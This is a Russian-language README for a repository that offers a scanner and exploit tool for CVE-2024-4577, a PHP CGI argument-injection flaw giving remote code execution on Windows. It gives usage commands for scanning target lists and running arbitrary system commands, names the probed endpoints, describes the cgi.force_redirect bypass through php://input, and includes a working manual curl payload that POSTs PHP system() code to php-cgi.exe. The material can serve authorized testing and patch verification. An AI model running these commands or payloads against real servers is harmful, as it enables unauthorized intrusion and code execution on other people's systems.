
Инструмент сканера и эксплойта для CVE-2024-4577, уязвимости внедрения аргументов в PHP CGI, позволяющей удаленное выполнение кода в системах Windows. Включает модули обнаружения и выполнения команд.
CVE-2024-4577 — это критическая уязвимость внедрения аргументов PHP CGI, которая затрагивает системы Windows, работающие с PHP в режиме CGI. Эта ошибка позволяет удалённым злоумышленникам внедрять аргументы в командную строку PHP с помощью специально созданных URL-адресов, что приводит к удалённому выполнению кода (RCE).
Этот репозиторий содержит:
CVE-2024-4577.py: сканер для обнаружения уязвимых целей.exploit.py: эксплойт-инструмент, который отправляет PHP-код и выполняет системные команды на уязвимом сервере.⚠️ ОТКАЗ ОТ ОТВЕТСТВЕННОСТИ
Этот проект предназначен только для образовательных целей и авторизованного тестирования. Автор не несёт ответственности за любое неправомерное использование этого кода. Используйте ответственно и только в средах, которыми вы владеете или на тестирование которых у вас есть явное разрешение.
requestsУстановите зависимости:
pip install -r requirements.txt
Проверьте, уязвима ли цель к CVE-2024-4577:
python3 CVE-2024-4577.py -u http://target.com

python3 CVE-2024-4577.py -f urls.txt

python3 CVE-2024-4577.py -u http://target.com -p /custom/path.php
Сканер и эксплойт проверяют распространённые CGI-точки входа, такие как:
/php-cgi/php-cgi.exe
/index.php
/test.php
/test.hello
Полезная нагрузка обходит cgi.force_redirect и внедряет вредоносный PHP-код через php://input.
Выполняйте произвольные системные команды на уязвимой цели:
python3 exploit.py -u http://target.com -c "id"

python3 exploit.py -f urls.txt -c "id"

Вы также можете эксплуатировать уязвимость вручную с помощью curl:
curl -X POST http://target.com/php-cgi/php-cgi.exe -d "<?php system('uname -a'); ?>"
Это отправляет PHP-полезную нагрузку, которая выполняет uname -a на сервере и возвращает результат.

Этот код распространяется под лицензией MIT. Подробнее см. в LICENSE.